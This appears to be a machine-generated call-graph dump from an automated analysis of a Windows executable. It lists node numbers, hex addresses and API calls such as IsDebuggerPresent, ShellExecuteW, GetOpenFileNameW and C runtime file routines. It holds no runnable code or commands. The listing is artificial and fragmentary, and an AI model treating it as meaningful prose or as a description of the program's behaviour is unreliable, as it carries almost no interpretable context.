45785f _strcat _wcslen _wcscpy ctype 85149->85156 85157 410d40 85150->85157 85151 40c760 78 API calls 85151->85156 85152 443576 78 API calls 85152->85156 85153 453081 111 API calls 85153->85156 85154 4138ba 67 API calls _malloc 85154->85156 85156->85150 85156->85151 85156->85152 85156->85153 85156->85154 85204 40f580 85156->85204 85159 410d55 85157->85159 85158 410ded VirtualProtect 85160 410dbb 85158->85160 85159->85158 85159->85160 85160->85074 85160->85075 85161->85073 85162->85079 85163->85078 85164->85082 85165->85088 85166->85088 85167->85088 85168->85100 85169->85104 85170->85106 85172 41171a 75 API calls 85171->85172 85173 40c088 85172->85173 85174 41171a 75 API calls 85173->85174 85175 40c096 85174->85175 85176 4608ce 75 API calls _realloc 85175->85176 85176->85111 85178 40c752 85177->85178 85179 40c747 85177->85179 85178->85114 85179->85178 85183 402ae0 85179->85183 85181 42a572 _realloc 85181->85114 85182->85113 85184 42a06a 85183->85184 85185 402aef 85183->85185 85190 401380 85184->85190 85185->85181 85187 42a072 85188 41171a 75 API calls 85187->85188 85189 42a095 _realloc 85188->85189 85189->85181 85191 41171a 75 API calls 85190->85191 85192 401387 85191->85192 85192->85187 85193->85122 85194->85123 85195->85127 85196->85124 85197->85134 85198->85137 85199->85135 85200->85142 85201->85145 85202->85147 85203->85139 85205 429440 85204->85205 85206 40f589 _wcslen 85204->85206 85207 40f58f WideCharToMultiByte 85206->85207 85208 40f5d8 85207->85208 85209 40f5ad 85207->85209 85208->85156 85210 41171a 75 API calls 85209->85210 85211 40f5bb WideCharToMultiByte 85210->85211 85211->85156 85212->85097 85213 4034b0 85214 4034b9 85213->85214 85215 4034bd 85213->85215 85216 41171a 75 API calls 85215->85216 85218 42a0ba 85215->85218 85217 4034fe _realloc ctype 85216->85217 85219 416193 85256 41718c 85219->85256 85221 41619f GetStartupInfoW 85223 4161c2 85221->85223 85257 41aa31 HeapCreate 85223->85257 85225 416212 85259 416e29 GetModuleHandleW 85225->85259 85230 416223 __RTC_Initialize 85293 41b669 85230->85293 85232 416231 85233 41623d GetCommandLineW 85232->85233 85362 4117af 67 API calls 3 library calls 85232->85362 85308 42235f GetEnvironmentStringsW 85233->85308 85236 41624c 85314 4222b1 GetModuleFileNameW 85236->85314 85237 41623c 85237->85233 85239 416256 85240 416261 85239->85240 85363 4117af 67 API calls 3 library calls 85239->85363 85318 422082 85240->85318 85244 416272 85331 41186e 85244->85331 85247 416279 85249 416284 __wwincmdln 85247->85249 85365 4117af 67 API calls 3 library calls 85247->85365 85337 40d7f0 85249->85337 85252 4162b3 85367 411a4b 67 API calls _doexit 85252->85367 85255 4162b8 __alloc_osfhnd 85256->85221 85258 416206 85257->85258 85258->85225 85360 41616a 67 API calls 3 library calls 85258->85360 85260 416e44 85259->85260 85261 416e3d 85259->85261 85263 416fac 85260->85263 85264 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 85260->85264 85368 41177f Sleep GetModuleHandleW 85261->85368 85378 416ad5 70 API calls 2 library calls 85263->85378 85267 416e97 TlsAlloc 85264->85267 85266 416e43 85266->85260 85269 416218 85267->85269 85270 416ee5 TlsSetValue 85267->85270 85269->85230 85361 41616a 67 API calls 3 library calls 85269->85361 85270->85269 85271 416ef6 85270->85271 85369 411a69 6 API calls 4 library calls 85271->85369 85273 416efb 85274 41696e __encode_pointer 6 API calls 85273->85274 85275 416f06 85274->85275 85276 41696e __encode_pointer 6 API calls 85275->85276 85277 416f16 85276->85277 85278 41696e __encode_pointer 6 API calls 85277->85278 85279 416f26 85278->85279 85280 41696e __encode_pointer 6 API calls 85279->85280 85281 416f36 85280->85281 85370 41828b InitializeCriticalSectionAndSpinCount __alloc_osfhnd 85281->85370 85283 416f43 85283->85263 85284 4169e9 __decode_pointer 6 API calls 85283->85284 85285 416f57 85284->85285 85285->85263 85371 416ffb 85285->85371 85288 4169e9 __decode_pointer 6 API calls 85289 416f8a 85288->85289 85289->85263 85290 416f91 85289->85290 85377 416b12 67 API calls 5 library calls 85290->85377 85292 416f99 GetCurrentThreadId 85292->85269 85397 41718c 85293->85397 85295 41b675 GetStartupInfoA 85296 416ffb __calloc_crt 67 API calls 85295->85296 85303 41b696 85296->85303 85297 41b8b4 __alloc_osfhnd 85297->85232 85298 41b831 GetStdHandle 85302 41b7fb 85298->85302 85299 41b896 SetHandleCount 85299->85297 85300 416ffb __calloc_crt 67 API calls 85300->85303 85301 41b843 GetFileType 85301->85302 85302->85297 85302->85298 85302->85299 85302->85301 85399 4189e6 InitializeCriticalSectionAndSpinCount __alloc_osfhnd 85302->85399 85303->85297 85303->85300 85303->85302 85304 41b77e 85303->85304 85304->85297 85304->85302 85305 41b7a7 GetFileType 85304->85305 85398 4189e6 InitializeCriticalSectionAndSpinCount __alloc_osfhnd 85304->85398 85305->85304 85309 422370 85308->85309 85310 422374 85308->85310 85309->85236 85311 416fb6 __malloc_crt 67 API calls 85310->85311 85313 422395 _realloc 85311->85313 85312 42239c FreeEnvironmentStringsW 85312->85236 85313->85312 85315 4222e6 _wparse_cmdline 85314->85315 85316 416fb6 __malloc_crt 67 API calls 85315->85316 85317 422329 _wparse_cmdline 85315->85317 85316->85317 85317->85239 85319 42209a _wcslen 85318->85319 85323 416267 85318->85323 85320 416ffb __calloc_crt 67 API calls 85319->85320 85326 4220be _wcslen 85320->85326 85321 422123 85322 413a88 __mtterm 67 API calls 85321->85322 85322->85323 85323->85244 85364 4117af 67 API calls 3 library calls 85323->85364 85324 416ffb __calloc_crt 67 API calls 85324->85326 85325 422149 85327 413a88 __mtterm 67 API calls 85325->85327 85326->85321 85326->85323 85326->85324 85326->85325 85329 422108 85326->85329 85400 426349 67 API calls _sprintf 85326->85400 85327->85323 85329->85326 85401 417d93 10 API calls 3 library calls 85329->85401 85332 41187c __IsNonwritableInCurrentImage 85331->85332 85402 418486 85332->85402 85334 41189a __initterm_e 85335 411421 __cinit 74 API calls 85334->85335 85336 4118b9 __IsNonwritableInCurrentImage __initterm 85334->85336 85335->85336 85336->85247 85338 431bcb 85337->85338 85339 40d80c 85337->85339 85340 4092c0 VariantClear 85339->85340 85341 40d847 85340->85341 85406 40eb50 85341->85406 85344 40d877 85409 411ac6 67 API calls 4 library calls 85344->85409 85347 40d888 85410 411b24 67 API calls _sprintf 85347->85410 85349 40d891 85411 40f370 SystemParametersInfoW SystemParametersInfoW 85349->85411 85351 40d89f 85412 40d6d0 GetCurrentDirectoryW 85351->85412 85353 40d8a7 SystemParametersInfoW 85354 40d8d4 85353->85354 85355 40d8cd FreeLibrary 85353->85355 85356 4092c0 VariantClear 85354->85356 85355->85354 85357 40d8dd 85356->85357 85358 4092c0 VariantClear 85357->85358 85359 40d8e6 85358->85359 85359->85252 85366 411a1f 67 API calls _doexit 85359->85366 85360->85225 85361->85230 85362->85237 85363->85240 85364->85244 85365->85249 85366->85252 85367->85255 85368->85266 85369->85273 85370->85283 85374 417004 85371->85374 85373 416f70 85373->85263 85373->85288 85374->85373 85375 417022 Sleep 85374->85375 85379 422452 85374->85379 85376 417037 85375->85376 85376->85373 85376->85374 85377->85292 85378->85269 85380 42245e __alloc_osfhnd 85379->85380 85381 422476 85380->85381 85389 422495 _memset 85380->85389 85392 417f23 67 API calls __getptd_noexit 85381->85392 85383 42247b 85393 417ebb 6 API calls 2 library calls 85383->85393 85385 422507 HeapAlloc 85385->85389 85386 42248b __alloc_osfhnd 85386->85374 85388 418407 __lock 66 API calls 85388->85389 85389->85385 85389->85386 85389->85388 85394 41a74c 5 API calls 2 library calls 85389->85394 85395 42254e LeaveCriticalSection _doexit 85389->85395 85396 411afc 6 API calls __decode_pointer 85389->85396 85392->85383 85394->85389 85395->85389 85396->85389 85397->85295 85398->85304 85399->85302 85400->85326 85401->85329 85403 41848c 85402->85403 85404 41696e __encode_pointer 6 API calls 85403->85404 85405 4184a4 85403->85405 85404->85403 85405->85334 85450 40eb70 85406->85450 85409->85347 85410->85349 85411->85351 85454 401f80 85412->85454 85414 40d6f1 IsDebuggerPresent 85415 431a9d MessageBoxA 85414->85415 85417 40d6ff 85414->85417 85416 431ab6 85415->85416 85556 403e90 75 API calls 3 library calls 85416->85556 85417->85416 85418 40d71f 85417->85418 85524 40f3b0 85418->85524 85422 40d73a GetFullPathNameW 85554 401440 127 API calls _wcscat 85422->85554 85424 40d77a 85425 40d782 85424->85425 85426 431b09 SetCurrentDirectoryW 85424->85426 85427 40d78b 85425->85427 85557 43604b 6 API calls 85425->85557 85426->85425 85536 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 85427->85536 85431 431b28 85431->85427 85433 431b30 GetModuleFileNameW 85431->85433 85434 431ba4 GetForegroundWindow ShellExecuteW 85433->85434 85435 431b4c 85433->85435 85438 40d7c7 85434->85438 85558 401b70 85435->85558 85436 40d795 85444 40d7a8 85436->85444 85544 40e1e0 85436->85544 85442 40d7d1 SetCurrentDirectoryW 85438->85442 85442->85353 85443 431b66 85565 40d3b0 75 API calls 2 library calls 85443->85565 85444->85438 85555 401000 Shell_NotifyIconW _memset 85444->85555 85447 431b72 GetForegroundWindow ShellExecuteW 85448 431b9f 85447->85448 85448->85438 85449 40eba0 LoadLibraryA GetProcAddress 85449->85344 85451 40d86e 85450->85451 85452 40eb76 LoadLibraryA 85450->85452 85451->85344 85451->85449 85452->85451 85453 40eb87 GetProcAddress 85452->85453 85453->85451 85566 40e680 85454->85566 85458 401fa2 GetModuleFileNameW 85584 40ff90 85458->85584 85460 401fbd 85596 4107b0 85460->85596 85463 401b70 75 API calls 85464 401fe4 85463->85464 85599 4019e0 85464->85599 85466 401ff2 85467 4092c0 VariantClear 85466->85467 85468 402002 85467->85468 85469 401b70 75 API calls 85468->85469 85470 40201c 85469->85470 85471 4019e0 76 API calls 85470->85471 85472 40202c 85471->85472 85473 401b70 75 API calls 85472->85473 85474 40203c 85473->85474 85607 40c3e0 85474->85607 85476 40204d 85477 40c060 75 API calls 85476->85477 85478 402061 85477->85478 85625 401a70 85478->85625 85480 40206e 85632 4115d0 85480->85632 85483 42c174 85485 401a70 75 API calls 85483->85485 85484 402088 85486 4115d0 __wcsicoll 79 API calls 85484->85486 85487 42c189 85485->85487 85488 402093 85486->85488 85490 401a70 75 API calls 85487->85490 85488->85487 85489 40209e 85488->85489 85491 4115d0 __wcsicoll 79 API calls 85489->85491 85492 42c1a7 85490->85492 85493 4020a9 85491->85493 85494 42c1b0 GetModuleFileNameW 85492->85494 85493->85494 85495 4020b4 85493->85495 85497 401a70 75 API calls 85494->85497 85496 4115d0 __wcsicoll 79 API calls 85495->85496 85498 4020bf 85496->85498 85499 42c1e2 85497->85499 85500 402107 85498->85500 85505 401a70 75 API calls 85498->85505 85507 42c20a _wcscpy 85498->85507 85644 40df50 75 API calls 85499->85644 85503 402119 85500->85503 85500->85507 85502 42c1f1 85506 401a70 75 API calls 85502->85506 85504 42c243 85503->85504 85640 40e7e0 76 API calls 85503->85640 85509 4020e5 _wcscpy 85505->85509 85510 42c201 85506->85510 85511 401a70 75 API calls 85507->85511 85515 401a70 75 API calls 85509->85515 85510->85507 85519 402148 85511->85519 85512 402132 85641 40d030 76 API calls 85512->85641 85514 40213e 85516 4092c0 VariantClear 85514->85516 85515->85500 85516->85519 85517 402184 85521 4092c0 VariantClear 85517->85521 85519->85517 85522 401a70 75 API calls 85519->85522 85642 40d030 76 API calls 85519->85642 85643 40e640 76 API calls 85519->85643 85523 402196 ctype 85521->85523 85522->85519 85523->85414 85525 42ccf4 _memset 85524->85525 85526 40f3c9 85524->85526 85529 42cd05 GetOpenFileNameW 85525->85529 86327 40ffb0 76 API calls ctype 85526->86327 85528 40f3d2 86328 410130 SHGetMalloc 85528->86328 85529->85526 85531 40d732 85529->85531 85531->85422 85531->85424 85532 40f3d9 86333 410020 88 API calls __wcsicoll 85532->86333 85534 40f3e7 86334 40f400 85534->86334 85537 42b9d3 85536->85537 85538 41025a LoadImageW RegisterClassExW 85536->85538 86379 443e8f EnumResourceNamesW LoadImageW 85537->86379 86378 4102f0 7 API calls 85538->86378 85541 40d790 85543 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 85541->85543 85542 42b9da 85543->85436 85545 40e207 _memset 85544->85545 85546 40e262 85545->85546 85547 42aa14 DestroyIcon 85545->85547 85548 40e2a4 85546->85548 86402 43737d 84 API calls __wcsicoll 85546->86402 85547->85546 85550 40e2c0 Shell_NotifyIconW 85548->85550 85551 42aa50 Shell_NotifyIconW 85548->85551 86380 401be0 85550->86380 85553 40e2da 85553->85444 85554->85424 85555->85438 85556->85424 85557->85431 85559 401b76 _wcslen 85558->85559 85560 41171a 75 API calls 85559->85560 85563 401bc5 85559->85563 85561 401bad _realloc 85560->85561 85562 41171a 75 API calls 85561->85562 85562->85563 85564 40d3b0 75 API calls 2 library calls 85563->85564 85564->85443 85565->85447 85567 40c060 75 API calls 85566->85567 85568 401f90 85567->85568 85569 402940 85568->85569 85570 40294a __write_nolock 85569->85570 85645 4021e0 85570->85645 85573 402972 85583 4029a4 85573->85583 85657 401cf0 85573->85657 85574 402ae0 75 API calls 85574->85583 85575 402a8c 85576 401b70 75 API calls 85575->85576 85582 402abe 85575->85582 85578 402ab3 85576->85578 85577 401b70 75 API calls 85577->85583 85661 40d970 75 API calls 2 library calls 85578->85661 85579 401cf0 75 API calls 85579->85583 85582->85458 85583->85574 85583->85575 85583->85577 85583->85579 85660 40d970 75 API calls 2 library calls 85583->85660 85663 40f5e0 85584->85663 85587 40ffa6 85587->85460 85589 42b6d8 85590 42b6e6 85589->85590 85719 434fe1 85589->85719 85592 413a88 __mtterm 67 API calls 85590->85592 85593 42b6f5 85592->85593 85594 434fe1 106 API calls 85593->85594 85595 42b702 85594->85595 85595->85460 85597 41171a 75 API calls 85596->85597 85598 401fd6 85597->85598 85598->85463 85600 401a03 85599->85600 85601 4019e5 85599->85601 85600->85601 85602 401a1a 85600->85602 85604 4019ff 85601->85604 86315 404260 76 API calls 85601->86315 86316 404260 76 API calls 85602->86316 85604->85466 85606 401a26 85606->85466 85608 40c3e4 85607->85608 85609 40c42c 85607->85609 85610 40c3f0 85608->85610 85611 42a475 85608->85611 85612 42a422 85609->85612 85613 40c435 85609->85613 86317 4042f0 75 API calls __cinit 85610->86317 86322 453155 75 API calls 85611->86322 85615 42a427 85612->85615 85616 42a445 85612->85616 85617 40c441 85613->85617 85618 42a455 85613->85618 85624 40c3fb 85615->85624 86319 453155 75 API calls 85615->86319 86320 453155 75 API calls 85616->86320 86318 4042f0 75 API calls __cinit 85617->86318 86321 453155 75 API calls 85618->86321 85624->85476 85626 401a90 85625->85626 85627 401a77 85625->85627 85629 4021e0 75 API calls 85626->85629 85628 401a8d 85627->85628 86323 404080 75 API calls _realloc 85627->86323 85628->85480 85631 401a9c 85629->85631 85631->85480 85633 4115e1 85632->85633 85634 411650 85632->85634 85638 40207d 85633->85638 86324 417f23 67 API calls __getptd_noexit 85633->86324 86326 4114bf 79 API calls 3 library calls 85634->86326 85637 4115ed 86325 417ebb 6 API calls 2 library calls 85637->86325 85638->85483 85638->85484 85640->85512 85641->85514 85642->85519 85643->85519 85644->85502 85646 4021f1 _wcslen 85645->85646 85647 42a598 85645->85647 85650 402205 85646->85650 85651 402226 85646->85651 85648 40c740 75 API calls 85647->85648 85649 42a5a2 85648->85649 85662 404020 75 API calls ctype 85650->85662 85653 401380 75 API calls 85651->85653 85654 40222d 85653->85654 85654->85649 85656 41171a 75 API calls 85654->85656 85655 40220c _realloc 85655->85573 85656->85655 85658 402ae0 75 API calls 85657->85658 85659 401cf7 85658->85659 85659->85573 85660->85583 85661->85582 85662->85655 85664 40f580 77 API calls 85663->85664 85665 40f5f8 _strcat ctype 85664->85665 85723 40f6d0 85665->85723 85670 42b2ee 85752 4151b0 85670->85752 85672 40f679 85672->85670 85674 40f681 85672->85674 85739 414e94 85674->85739 85677 40f68b 85677->85587 85682 452574 85677->85682 85679 42b31d 85679->85679 85758 415484 85679->85758 85681 42b33d 85683 41557c _fseek 105 API calls 85682->85683 85684 4525df 85683->85684 86260 4523ce 85684->86260 85687 4525fc 85687->85589 85688 4151b0 __fread_nolock 81 API calls 85689 45261d 85688->85689 85690 4151b0 __fread_nolock 81 API calls 85689->85690 85691 45262e 85690->85691 85692 4151b0 __fread_nolock 81 API calls 85691->85692 85693 452649 85692->85693 85694 4151b0 __fread_nolock 81 API calls 85693->85694 85695 452666 85694->85695 85696 41557c _fseek 105 API calls 85695->85696 85697 452682 85696->85697 85698 4138ba _malloc 67 API calls 85697->85698 85699 45268e 85698->85699 85700 4138ba _malloc 67 API calls 85699->85700 85701 45269b 85700->85701 85702 4151b0 __fread_nolock 81 API calls 85701->85702 85703 4526ac 85702->85703 85704 44afdc GetSystemTimeAsFileTime 85703->85704 85705 4526bf 85704->85705 85706 4526d5 85705->85706 85707 4526fd 85705->85707 85710 413a88 __mtterm 67 API calls 85706->85710 85708 452704 85707->85708 85709 45275b 85707->85709 86266 44b195 85708->86266 85713 413a88 __mtterm 67 API calls 85709->85713 85711 4526df 85710->85711 85714 413a88 __mtterm 67 API calls 85711->85714 85716 452759 85713->85716 85717 4526e8 85714->85717 85715 452753 85718 413a88 __mtterm 67 API calls 85715->85718 85716->85589 85717->85589 85718->85716 85720 434feb 85719->85720 85722 434ff1 85719->85722 85721 414e94 __fcloseall 106 API calls 85720->85721 85721->85722 85722->85590 85724 40f6dd _strlen 85723->85724 85771 40f790 85724->85771 85727 414e06 85791 414d40 85727->85791 85729 40f666 85729->85670 85730 40f450 85729->85730 85734 40f45a _strcat _realloc __write_nolock 85730->85734 85731 4151b0 __fread_nolock 81 API calls 85731->85734 85733 42936d 85735 41557c _fseek 105 API calls 85733->85735 85734->85731 85734->85733 85738 40f531 85734->85738 85874 41557c 85734->85874 85736 429394 85735->85736 85737 4151b0 __fread_nolock 81 API calls 85736->85737 85737->85738 85738->85672 85740 414ea0 __alloc_osfhnd 85739->85740 85741 414ed1 85740->85741 85742 414eb4 85740->85742 85745 415965 __lock_file 68 API calls 85741->85745 85750 414ec9 __alloc_osfhnd 85741->85750 86013 417f23 67 API calls __getptd_noexit 85742->86013 85744 414eb9 86014 417ebb 6 API calls 2 library calls 85744->86014 85747 414ee9 85745->85747 85997 414e1d 85747->85997 85750->85677 86082 41511a 85752->86082 85754 4151c8 85755 44afdc 85754->85755 86253 4431e0 85755->86253 85757 44affd 85757->85679 85759 415490 __alloc_osfhnd 85758->85759 85760 4154bb 85759->85760 85761 41549e 85759->85761 85763 415965 __lock_file 68 API calls 85760->85763 86257 417f23 67 API calls __getptd_noexit 85761->86257 85765 4154c3 85763->85765 85764 4154a3 86258 417ebb 6 API calls 2 library calls 85764->86258 85767 4152e7 __ftell_nolock 71 API calls 85765->85767 85768 4154cf 85767->85768 86259 4154e8 LeaveCriticalSection LeaveCriticalSection _ftell 85768->86259 85770 4154b3 __alloc_osfhnd 85770->85681 85774 40f7ae _memset 85771->85774 85772 42a349 85774->85772 85775 40f628 85774->85775 85776 415258 85774->85776 85775->85727 85777 415285 85776->85777 85778 415268 85776->85778 85777->85778 85780 41528c 85777->85780 85787 417f23 67 API calls __getptd_noexit 85778->85787 85789 41c551 103 API calls 14 library calls 85780->85789 85781 41526d 85788 417ebb 6 API calls 2 library calls 85781->85788 85784 4152b2 85785 41527d 85784->85785 85790 4191c9 101 API calls 6 library calls 85784->85790 85785->85774 85787->85781 85789->85784 85790->85785 85792 414d4c __alloc_osfhnd 85791->85792 85793 414d5f 85792->85793 85796 414d95 85792->85796 85843 417f23 67 API calls __getptd_noexit 85793->85843 85795 414d64 85844 417ebb 6 API calls 2 library calls 85795->85844 85810 41e28c 85796->85810 85799 414d9a 85800 414da1 85799->85800 85801 414dae 85799->85801 85845 417f23 67 API calls __getptd_noexit 85800->85845 85803 414dd6 85801->85803 85804 414db6 85801->85804 85828 41dfd8 85803->85828 85846 417f23 67 API calls __getptd_noexit 85804->85846 85808 414d74 __alloc_osfhnd @_EH4_CallFilterFunc@8 85808->85729 85811 41e298 __alloc_osfhnd 85810->85811 85812 418407 __lock 67 API calls 85811->85812 85818 41e2a6 85812->85818 85813 41e322 85814 416fb6 __malloc_crt 67 API calls 85813->85814 85816 41e32c 85814->85816 85825 41e31b 85816->85825 85853 4189e6 InitializeCriticalSectionAndSpinCount __alloc_osfhnd 85816->85853 85817 41e3b0 __alloc_osfhnd 85817->85799 85818->85813 85820 418344 __mtinitlocknum 67 API calls 85818->85820 85818->85825 85851 4159a6 68 API calls __lock 85818->85851 85852 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 85818->85852 85820->85818 85822 41e351 85823 41e35c 85822->85823 85824 41e36f EnterCriticalSection 85822->85824 85826 413a88 __mtterm 67 API calls 85823->85826 85824->85825 85848 41e3bb 85825->85848 85826->85825 85837 41dffb __wopenfile 85828->85837 85829 41e015 85858 417f23 67 API calls __getptd_noexit 85829->85858 85831 41e1e9 85831->85829 85834 41e247 85831->85834 85832 41e01a 85859 417ebb 6 API calls 2 library calls 85832->85859 85855 425db0 85834->85855 85837->85829 85837->85831 85860 4136bc 79 API calls 2 library calls 85837->85860 85839 41e1e2 85839->85831 85861 4136bc 79 API calls 2 library calls 85839->85861 85841 41e201 85841->85831 85862 4136bc 79 API calls 2 library calls 85841->85862 85843->85795 85845->85808 85846->85808 85847 414dfc LeaveCriticalSection LeaveCriticalSection _ftell 85847->85808 85854 41832d LeaveCriticalSection 85848->85854 85850 41e3c2 85850->85817 85851->85818 85852->85818 85853->85822 85854->85850 85863 425ce4 85855->85863 85857 414de1 85857->85847 85858->85832 85860->85839 85861->85841 85862->85831 85864 425cf0 __alloc_osfhnd 85863->85864 85865 425d03 85864->85865 85868 425d41 85864->85868 85866 417f23 _sprintf 67 API calls 85865->85866 85867 425d08 85866->85867 85870 417ebb _sprintf 6 API calls 85867->85870 85869 4255c4 __tsopen_nolock 132 API calls 85868->85869 85871 425d5b 85869->85871 85873 425d17 __alloc_osfhnd 85870->85873 85872 425d82 __sopen_helper LeaveCriticalSection 85871->85872 85872->85873 85873->85857 85877 415588 __alloc_osfhnd 85874->85877 85875 415596 85905 417f23 67 API calls __getptd_noexit 85875->85905 85876 4155c4 85887 415965 85876->85887 85877->85875 85877->85876 85880 41559b 85906 417ebb 6 API calls 2 library calls 85880->85906 85886 4155ab __alloc_osfhnd 85886->85734 85888 415977 85887->85888 85889 415999 EnterCriticalSection 85887->85889 85888->85889 85891 41597f 85888->85891 85890 4155cc 85889->85890 85893 4154f2 85890->85893 85892 418407 __lock 67 API calls 85891->85892 85892->85890 85894 415512 85893->85894 85895 415502 85893->85895 85897 415524 85894->85897 85908 4152e7 85894->85908 85962 417f23 67 API calls __getptd_noexit 85895->85962 85925 41486c 85897->85925 85898 415507 85907 4155f7 LeaveCriticalSection LeaveCriticalSection _ftell 85898->85907 85905->85880 85907->85886 85909 41531a 85908->85909 85910 4152fa 85908->85910 85912 41453a __fileno 67 API calls 85909->85912 85963 417f23 67 API calls __getptd_noexit 85910->85963 85914 415320 85912->85914 85913 4152ff 85964 417ebb 6 API calls 2 library calls 85913->85964 85916 41efd4 __locking 71 API calls 85914->85916 85917 415335 85916->85917 85918 4153a9 85917->85918 85920 415364 85917->85920 85924 41530f 85917->85924 85965 417f23 67 API calls __getptd_noexit 85918->85965 85921 41efd4 __locking 71 API calls 85920->85921 85920->85924 85922 415404 85921->85922 85923 41efd4 __locking 71 API calls 85922->85923 85922->85924 85923->85924 85924->85897 85926 4148a7 85925->85926 85927 414885 85925->85927 85931 41453a 85926->85931 85927->85926 85928 41453a __fileno 67 API calls 85927->85928 85929 4148a0 85928->85929 85966 41c3cf 101 API calls 6 library calls 85929->85966 85932 41455e 85931->85932 85933 414549 85931->85933 85937 41efd4 85932->85937 85967 417f23 67 API calls __getptd_noexit 85933->85967 85935 41454e 85968 417ebb 6 API calls 2 library calls 85935->85968 85938 41efe0 __alloc_osfhnd 85937->85938 85939 41f003 85938->85939 85940 41efe8 85938->85940 85941 41f011 85939->85941 85946 41f052 85939->85946 85989 417f36 67 API calls __getptd_noexit 85940->85989 85991 417f36 67 API calls __getptd_noexit 85941->85991 85944 41efed 85990 417f23 67 API calls __getptd_noexit 85944->85990 85945 41f016 85992 417f23 67 API calls __getptd_noexit 85945->85992 85969 41ba3b 85946->85969 85950 41f01d 85993 417ebb 6 API calls 2 library calls 85950->85993 85951 41f058 85953 41f065 85951->85953 85954 41f07b 85951->85954 85979 41ef5f 85953->85979 85994 417f23 67 API calls __getptd_noexit 85954->85994 85956 41eff5 __alloc_osfhnd 85956->85898 85958 41f080 85995 417f36 67 API calls __getptd_noexit 85958->85995 85959 41f073 85996 41f0a6 LeaveCriticalSection __unlock_fhandle 85959->85996 85962->85898 85963->85913 85965->85924 85966->85926 85967->85935 85970 41ba47 __alloc_osfhnd 85969->85970 85971 41baa2 85970->85971 85974 418407 __lock 67 API calls 85970->85974 85972 41bac4 __alloc_osfhnd 85971->85972 85973 41baa7 EnterCriticalSection 85971->85973 85972->85951 85973->85972 85975 41ba73 85974->85975 85976 41ba8a 85975->85976 85978 4189e6 __alloc_osfhnd InitializeCriticalSectionAndSpinCount 85975->85978 85977 41bad2 ___lock_fhandle LeaveCriticalSection 85976->85977 85977->85971 85978->85976 85980 41b9c4 __lseeki64_nolock 67 API calls 85979->85980 85981 41ef6e 85980->85981 85982 41ef84 SetFilePointer 85981->85982 85983 41ef74 85981->85983 85985 41efa3 85982->85985 85986 41ef9b GetLastError 85982->85986 85984 417f23 _sprintf 67 API calls 85983->85984 85987 41ef79 85984->85987 85985->85987 85988 417f49 __dosmaperr 67 API calls 85985->85988 85986->85985 85987->85959 85988->85987 85989->85944 85990->85956 85991->85945 85992->85950 85994->85958 85995->85959 85996->85956 85998 414e31 85997->85998 85999 414e4d 85997->85999 86043 417f23 67 API calls __getptd_noexit 85998->86043 86001 414e46 85999->86001 86003 41486c __flush 101 API calls 85999->86003 86015 414f08 LeaveCriticalSection LeaveCriticalSection _ftell 86001->86015 86002 414e36 86044 417ebb 6 API calls 2 library calls 86002->86044 86005 414e59 86003->86005 86016 41e680 86005->86016 86008 41453a __fileno 67 API calls 86009 414e67 86008->86009 86020 41e5b3 86009->86020 86011 414e6d 86011->86001 86012 413a88 __mtterm 67 API calls 86011->86012 86012->86001 86013->85744 86015->85750 86017 41e690 86016->86017 86019 414e61 86016->86019 86018 413a88 __mtterm 67 API calls 86017->86018 86017->86019 86018->86019 86019->86008 86021 41e5bf __alloc_osfhnd 86020->86021 86022 41e5c7 86021->86022 86025 41e5e2 86021->86025 86060 417f36 67 API calls __getptd_noexit 86022->86060 86024 41e5f0 86062 417f36 67 API calls __getptd_noexit 86024->86062 86025->86024 86028 41e631 86025->86028 86026 41e5cc 86061 417f23 67 API calls __getptd_noexit 86026->86061 86032 41ba3b ___lock_fhandle 68 API calls 86028->86032 86030 41e5f5 86063 417f23 67 API calls __getptd_noexit 86030->86063 86034 41e637 86032->86034 86033 41e5fc 86064 417ebb 6 API calls 2 library calls 86033->86064 86036 41e652 86034->86036 86037 41e644 86034->86037 86065 417f23 67 API calls __getptd_noexit 86036->86065 86045 41e517 86037->86045 86038 41e5d4 __alloc_osfhnd 86038->86011 86041 41e64c 86066 41e676 LeaveCriticalSection __unlock_fhandle 86041->86066 86043->86002 86067 41b9c4 86045->86067 86047 41e57d 86080 41b93e 68 API calls 2 library calls 86047->86080 86048 41e527 86048->86047 86050 41e55b 86048->86050 86052 41b9c4 __lseeki64_nolock 67 API calls 86048->86052 86050->86047 86053 41b9c4 __lseeki64_nolock 67 API calls 86050->86053 86051 41e585 86055 41e5a7 86051->86055 86081 417f49 67 API calls 3 library calls 86051->86081 86056 41e552 86052->86056 86054 41e567 CloseHandle 86053->86054 86054->86047 86057 41e573 GetLastError 86054->86057 86055->86041 86059 41b9c4 __lseeki64_nolock 67 API calls 86056->86059 86057->86047 86059->86050 86060->86026 86061->86038 86062->86030 86063->86033 86065->86041 86066->86038 86068 41b9d1 86067->86068 86069 41b9e9 86067->86069 86070 417f36 __close 67 API calls 86068->86070 86071 417f36 __close 67 API calls 86069->86071 86079 41ba2e 86069->86079 86072 41b9d6 86070->86072 86073 41ba17 86071->86073 86074 417f23 _sprintf 67 API calls 86072->86074 86075 417f23 _sprintf 67 API calls 86073->86075 86076 41b9de 86074->86076 86077 41ba1e 86075->86077 86076->86048 86078 417ebb _sprintf 6 API calls 86077->86078 86078->86079 86079->86048 86080->86051 86081->86055 86083 415126 __alloc_osfhnd 86082->86083 86084 41513a _memset 86083->86084 86085 41516f 86083->86085 86086 415164 __alloc_osfhnd 86083->86086 86111 417f23 67 API calls __getptd_noexit 86084->86111 86087 415965 __lock_file 68 API calls 86085->86087 86086->85754 86089 415177 86087->86089 86095 414f10 86089->86095 86090 415154 86112 417ebb 6 API calls 2 library calls 86090->86112 86096 414f4c 86095->86096 86099 414f2e _memset 86095->86099 86113 4151a6 LeaveCriticalSection LeaveCriticalSection _ftell 86096->86113 86097 414f37 86164 417f23 67 API calls __getptd_noexit 86097->86164 86099->86096 86099->86097 86102 414f8b 86099->86102 86102->86096 86103 4150a9 _memset 86102->86103 86104 41453a __fileno 67 API calls 86102->86104 86106 4150d5 _memset 86102->86106 86114 41ed9e 86102->86114 86144 41e6b1 86102->86144 86166 41ee9b 67 API calls 3 library calls 86102->86166 86167 417f23 67 API calls __getptd_noexit 86103->86167 86104->86102 86168 417f23 67 API calls __getptd_noexit 86106->86168 86110 414f3c 86165 417ebb 6 API calls 2 library calls 86110->86165 86111->86090 86113->86086 86115 41edaa __alloc_osfhnd 86114->86115 86116 41edb2 86115->86116 86117 41edcd 86115->86117 86238 417f36 67 API calls __getptd_noexit 86116->86238 86119 41eddb 